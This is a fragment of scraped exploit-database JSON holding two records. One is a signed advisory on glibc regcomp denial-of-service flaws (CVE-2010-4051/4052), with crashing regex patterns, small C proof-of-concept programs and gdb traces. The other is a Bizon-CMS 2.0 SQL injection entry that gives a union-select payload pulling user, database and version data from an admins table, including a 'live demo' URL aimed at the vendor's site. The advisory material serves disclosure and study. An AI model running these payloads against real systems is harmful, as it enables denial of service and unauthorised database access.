libc/regcomp(3) Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-01-08T00:00:00", "href": "http://0day.today/exploit/description/15419", "id": "1337DAY-ID-15419", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n[ GNU libc/regcomp(3) Multiple Vulnerabilities ]\r\n \r\nAuthor: Maksymilian Arciemowicz\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\nDate:\r\n- - Dis.: 01.10.2010\r\n- - Pub.: 07.01.2011\r\n \r\nCERT: VU#912279\r\nCVE:\r\nCVE-2010-4051\r\nCVE-2010-4052\r\n \r\nAffected (tested):\r\n- - Ubuntu 10.10\r\n- - Slackware 13\r\n- - Gentoo 18.10.2010\r\n- - FreeBSD 8.1 (grep(1))\r\n- - NetBSD 5.0.2 (grep(1))\r\n \r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/93\r\n \r\nExploit for proftpd:\r\nhttp://cxib.net/stuff/proftpd.gnu.c\r\n \r\n \r\n- --- 0.Description ---\r\nThe GNU C library is used as the C library in the GNU system and most\r\nsystems with the Linux kernel.\r\n \r\n# define RE_DUP_MAX (0x7fff)\r\n \r\nregcomp() is used to compile a regular expression into a form that is\r\nsuitable for subsequent regexec() searches.\r\n \r\n \r\n- --- 1. RE_DUP_MAX overflow ---\r\nThe main problem exists in regcomp(3) function of GNU libc implementation.\r\nLet`s try understand..\r\n \r\n- ---\r\nint\r\nregcomp (preg, pattern, cflags)\r\nregex_t *__restrict preg;\r\nconst char *__restrict pattern;\r\nint cflags;\r\n{\r\n- ---\r\n \r\nif we use '{', token type will be OP_OPEN_DUP_NUM.\r\n \r\n- ---\r\n/* This function parse repetition operators like \"*\", \"+\", \"{1,3}\" etc.\r\n*/\r\n \r\nstatic bin_tree_t *\r\nparse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,\r\nre_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)\r\n{\r\nbin_tree_t *tree = NULL, *old_tree = NULL;\r\nint i, start, end, start_idx = re_string_cur_idx (regexp);\r\nre_token_t start_token = *token;\r\n \r\nif (token->type == OP_OPEN_DUP_NUM)\r\n{\r\nend = 0;\r\nstart = fetch_number (regexp, token, syntax); <===== CONVERT VALUE\r\n- ---\r\n \r\nlet`s see fetch_number =>\r\n \r\n- ---\r\nstatic int\r\nfetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)\r\n{\r\nint num = -1;\r\nunsigned char c;\r\nwhile (1)\r\n{\r\nfetch_token (token, input, syntax);\r\nc = token->opr.c;\r\nif (BE (token->type == END_OF_RE, 0))\r\nreturn -2;\r\nif (token->type == OP_CLOSE_DUP_NUM || c == ',')\r\nbreak;\r\nnum = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)\r\n? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));\r\nnum = (num > RE_DUP_MAX) ? -2 : num;\r\n}\r\nreturn num;\r\n}\r\n- ---\r\n \r\nnow see regex.h to know, what value have RE_DUP_MAX\r\n \r\n- ---\r\n/* Maximum number of duplicates an interval can allow. Some systems\r\n(erroneously) define this in other header files, but we want our\r\nvalue, so remove any previous define. */\r\n# ifdef RE_DUP_MAX\r\n# undef RE_DUP_MAX\r\n# endif\r\n/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */\r\n# define RE_DUP_MAX (0x7fff)\r\n#endif\r\n- ---\r\n \r\ncalc_eclosure_iter() will call to calc_eclosure_iter() match time. and\r\ncrash in malloc(3). Simple Recursion.\r\n \r\nso we can't use value bigger 0x7fff in {n,}. regcomp(3) should return ERROR\r\nif we use more that one time '{' token.\r\n \r\nThey are many vectors attack\r\n \r\ngrep(1):\r\ncx@cx64:~$ ls |grep -E \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\npgrep(1):\r\ncx@cx64:~$ pgrep \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\nbregex from bacula-director-common\r\ncx@cx64:~$ bregex -f glob-0day.c\r\nEnter regex pattern: .*{10,}{10,}{10,}{10,}{10,}\r\nSegmentation fault\r\n \r\nwhatis(1):\r\ncx@cx64:~$ whatis -r \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\nand more like proftpd.\r\n \r\nSimple crash for CVE-2010-4051\r\n(gdb) x/i $rip\r\n=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)\r\n(gdb) x/i $eax\r\n0x2: Cannot access memory at address 0x2\r\n(gdb) x/i $rsp\r\n0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90\r\n(gdb) x/i 0x50($rsp)\r\nCannot access memory at address 0x7fffff5fef08\r\n \r\n \r\n#0 0x00007ffff7ad3ea2 in ?? () from /lib/libc.so.6\r\n#1 0x00007ffff7ad538e in malloc () from /lib/libc.so.6\r\n#2 0x00007ffff7b17d9b in ?? () from /lib/libc.so.6\r\n#3 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#4 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#5 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#6 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#7 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n...\r\n \r\n- ---PoC1---\r\n#include <regex.h>\r\n \r\nint main(){\r\nregex_t preg;\r\n \r\n// char fmt[]=\".*{10,}{10,}{10,}{10,}\"; // CVE-2010-4052\r\nchar fmt[]=\".*{10,}{10,}{10,}{10,}{10,}\"; CVE-2010-4051\r\n \r\nregcomp (&preg, fmt, REG_EXTENDED);\r\n \r\nreturn 0;\r\n}\r\n- ---PoC1---\r\n \r\n- --- 2. Stack Exhausion ---\r\nThis issue, may be also use to Denial of Service by stack exhausion\r\n \r\n#ls |grep -E \".*{10,}{10,}{111111,}\"\r\n \r\n- ---PoC2---\r\n#include <regex.h>\r\n \r\nint\r\nmain ()\r\n{\r\nregex_t preg;\r\n \r\nchar fmt[]=\".*{10,}{10,}{10,}{10,}\"; // CVE-2010-4052\r\n// char fmt[]=\".*{10,}{10,}{10,}{10,}{10,}\"; // CVE-2010-4051\r\n \r\nregcomp (&preg, fmt, REG_EXTENDED);\r\n \r\nreturn 0;\r\n}\r\n- ---PoC2---\r\n \r\nSuch a pattern may lead to allocate a large memory area, or large execution\r\ntime\r\n \r\nAs we can read in vsftpd/HACKING\r\n \r\n- ---\r\n- do not use libc features that are \"complicated\"\r\nand may contain security holes. For example, you probably shouldn't\r\ntry to use regcomp() to compile an untrusted regular expression.\r\nRegular expressions are just too complicated, and there are many\r\ndifferent libc's out there.\r\n- ---\r\n \r\nThat's true. But the worst implementation of lib C is GNU. There is a huge\r\ndifference using proftpd on NetBSD and Linux\r\n \r\n \r\n- --- 3. Stack Exhausions ---\r\nStack Exhausions was found in GNU glibc.\r\n \r\n- ---PoC3---\r\n/bin/egrep \"/(.*+++++++++++++++++++++++++++++(\\w+))/im\" cx\r\n- ---PoC3---\r\n \r\nwhen more '+' that more allocated memory. But let's see next one\r\n \r\n- ---PoC4---\r\ncx@cx64:~$ ulimit -m 100000\r\ncx@cx64:~$ ulimit -v 200000\r\ncx@cx64:~$ /bin/egrep \"/(.*+++++++++++++++++++++++++++++(\\w+))/im\" cx\r\nSegmentation fault\r\ncx@cx64:~$\r\n- ---PoC4---\r\n \r\nthe same command like in PoC 3, fails.\r\n \r\n(gdb) r \"/(.*++++++++++++++++++(\\w+))/im\" cx\r\nStarting program: /bin/egrep \"/(.*++++++++++++++++++(\\w+))/im\" cx\r\n/bin/egrep: Memory exhausted\r\n \r\nAdd one \"+\" more\r\n \r\nProgram exited with code 02.\r\n(gdb) r \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n \r\nStarting program: /bin/egrep \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n__libc_free (mem=0x7ffff720a010) at malloc.c:3709\r\n3709 if (chunk_is_mmapped(p)) /* release mmapped\r\nmemory. */\r\n(gdb) bt\r\n#0 __libc_free (mem=0x7ffff720a010) at malloc.c:3709\r\n#1 0x00007ffff7913431 in free_dfa_content (dfa=0x61f0c0) at regcomp.c:600\r\n#2 0x00007ffff7924e1c in re_compile_internal (preg=0x61f060, pattern=0x0,\r\n \r\nlength=140737488347176, syntax=<value optimized out>) at regcomp.c:823\r\n#3 0x00007ffff79256de in __re_compile_pattern (pattern=0x0,\r\nlength=<value optimized out>, bufp=0x7ffff720a010) at regcomp.c:231\r\n \r\n- ---malloc.c---\r\n...\r\nif (mem == 0) /* free(0) has no effect */\r\nreturn;\r\n \r\np = mem2chunk(mem);\r\n \r\n#if HAVE_MMAP\r\nif (chunk_is_mmapped(p))\r\n...\r\n- ---malloc.c---\r\n \r\nwhere\r\n#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))\r\n \r\nmem variable (mem=0x7ffff720a010)\r\n \r\n(gdb) x/x 0x7ffff720a010\r\n0x7ffff720a010: 0x00\r\n \r\nor\r\n \r\n(gdb) x/x 0x7ffff720a010\r\n0x7ffff720a010: Cannot access memory at address 0x7ffff720a010\r\n \r\n(gdb) x/i $rip\r\n=> 0x7ffff78d2c2d <__libc_free+29>: mov -0x8(%rdi),%rsi\r\n(gdb) x/i $rdi\r\n0x7ffff7ed3010: Cannot access memory at address 0x7ffff7ed3010\r\n(gdb) x/i $rsi\r\n0x0: Cannot access memory at address 0x0\r\n \r\nor check this\r\n \r\n(gdb) r \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n \r\nStarting program: /bin/egrep \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\nparse_dup_op (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2547\r\n2547 if (elem->token.type == SUBEXP)\r\n(gdb) x/i $rip\r\n=> 0x7ffff7922644 <parse_expression+756>: cmpb $0x11,0x30(%r15)\r\n(gdb) x/i $r15\r\n0x0: Cannot access memory at address 0x0\r\n \r\nrax 0x0 0\r\nrbx 0x61f0c0 6418624\r\nrcx 0xffffffffffffffa8 -88\r\nrdx 0x0 0\r\nrsi 0x61f0c0 6418624\r\nrdi 0x0 0\r\nrbp 0x7fffffffe010 0x7fffffffe010\r\nrsp 0x7fffffffdb70 0x7fffffffdb70\r\nr8 0xffffffff 4294967295\r\nr9 0x0 0\r\nr10 0x4022 16418\r\nr11 0x246 582\r\nr12 0x7fffffffdf70 140737488346992\r\nr13 0x4730ae8 74648296\r\nr14 0xffffffff 4294967295\r\nr15 0x0 0\r\nrip 0x7ffff7922644 0x7ffff7922644 <parse_expression+756>\r\n \r\n#0 parse_dup_op (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2547\r\n#1 parse_expression (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2390\r\n#2 0x00007ffff792387e in parse_branch (regexp=0x0, preg=0x61f0c0,\r\ntoken=0x0,\r\nsyntax=18446744073709551528, nest=-1, err=0x0) at regcomp.c:2163\r\n#3 parse_reg_exp (regexp=0x0, preg=0x61f0c0, token=0x0,\r\nsyntax=18446744073709551528, nest=-1, err=0x0) at regcomp.c:2122\r\n \r\n \r\nif (BE (start > 0, 0))\r\n{\r\ntree = elem;\r\nfor (i = 2; i <= start; ++i)\r\n{\r\nelem = duplicate_tree (elem, dfa);\r\ntree = create_tree (dfa, tree, elem, CONCAT);\r\nif (BE (elem == NULL || tree == NULL, 0))\r\ngoto parse_dup_op_espace;\r\n}\r\n \r\nif (start == end)\r\nreturn tree;\r\n \r\n/* Duplicate ELEM before it is marked optional. */\r\nelem = duplicate_tree (elem, dfa);\r\nold_tree = tree;\r\n}\r\nelse\r\nold_tree = NULL;\r\n \r\nif (elem->token.type == SUBEXP) <=CRASH HERE\r\n \r\nThese vulnerabilities are not really dangerous. However, there is the\r\npossibility to use the DoS attack. An example might be an exploit for\r\nproftpd. Option 3 allows to exhaustion avaliable memory. In my opinion, the\r\nGNU should fix the problem.\r\n \r\n \r\n- --- 4. Exploit ---\r\nproftpd/linux:\r\nhttp://cxib.net/stuff/proftpd.gnu.c\r\n \r\n \r\n- --- 5. Greets ---\r\nChristos Zoulas, US-CERT, sp3x, Infospec\r\n \r\n \r\n- --- 6. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\n \r\nEmail:\r\n- - cxib {a\\./t] securityreason [d=t} com\r\n \r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n \r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJNJk7rAAoJEIO8+dzW5bUwQ/YP/1G4nXltaUdMrdoUu39DM+WJ\r\nc3f+klSObS/1cDmzBOUte8ddiDdAVbU5yUvjkXkjWwMmxyPregxQxF85iUQ19UIP\r\nPekvo5iuI2Uh5hpWQiTxxHiTqEsGeP9XzKz9uLxQPijicD6vjovg8MkS9xEdg6ID\r\nQ1KW+7tlWY7xgGXTqZux9Y4CsMXqIaWhZlIPJjXDIEipe6HzsKZ0UmRPGEuJGSOh\r\n0tX8Om6PenFk8XOQSp20HMbK/W2qpc1hPAJ3/mrFO+uPF+8scpw413uhjwiSXOUj\r\nHUWE/iioFHRuX9eb2mwDuPKNe32OgLPRpcz1nITQVrOXTyfnwUtPrQeRu6h8Dpv7\r\nRGQtD2GdKknDpkfbUcw0/EHMSbWaJdOWZfFdDAl+rEhS8AwPNK2NJb+7LJ6AQmsM\r\nVCrJPP5eM1XM9jsQT9tvhyOunvw/HMoH/k+GP34p+FiKDIYI1LF3Gxj/w53gUK3F\r\nnYLzmoahnqC4WdfUfZizf24PXmH+385JoStrpC4Emn1kuFrM9i/eXQ3xI9My0OXJ\r\nPFHmVCFx/4iXSi/YNcShZellwi60kFe2OvfJ8BYtG15H+xr0djznLhMqbr2YMisJ\r\n066WWpfe1hTTJezLjbM8Sa9NnufXnEV+jWUocQ+dsSa2Tecn8DrsGor0Yd6UR6in\r\ns6+OIVFddtIZrQ6dw+Kk\r\n=kcIG\r\n-----END PGP SIGNATURE-----\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/15419"}, {"lastseen": "2016-04-19T23:38:27", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 1, "reporter": "Mr.SQL", "published": "2008-06-17T00:00:00", "type": "zdt", "title": "Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-06-17T00:00:00", "href": "http://0day.today/exploit/description/3199", "id": "1337DAY-ID-3199", "sourceData": "===============================================================\r\nBizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#########################################################################\r\n#################### Viva IslaM Viva IslaM ##############################\r\n##\r\n## Remote SQL Injection Vulnerability\r\n##\r\n## Bizon-CMS V2.0 ( index.php Page )\r\n##\r\n#########################################################################\r\n########################\r\n########################\r\n##\r\n## Script : Bizon-CMS\r\n##\r\n## version : V2.0\r\n##\r\n## site : www.bizon-soft.com\r\n##\r\n########################\r\n########################\r\n##\r\n## -(:: SQL ::)-\r\n##\r\n## www.site.com/photo/\r\n## index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10+from+admins/*\r\n##\r\n## -(:: L!VE DEMO ::)-\r\n##\r\n## http://www.bizon-soft.com/bizon-cms-demo/photo/index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,@@version,current_user,database(),10+from+admins/*\r\n##\r\n#######################\r\n#######################\r\n\r\n######################################################################################################\r\n######################################################################################################\r\n -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-\r\n :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::\r\n######################################################################################################\r\n######################################################################################################\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/3199"}]}}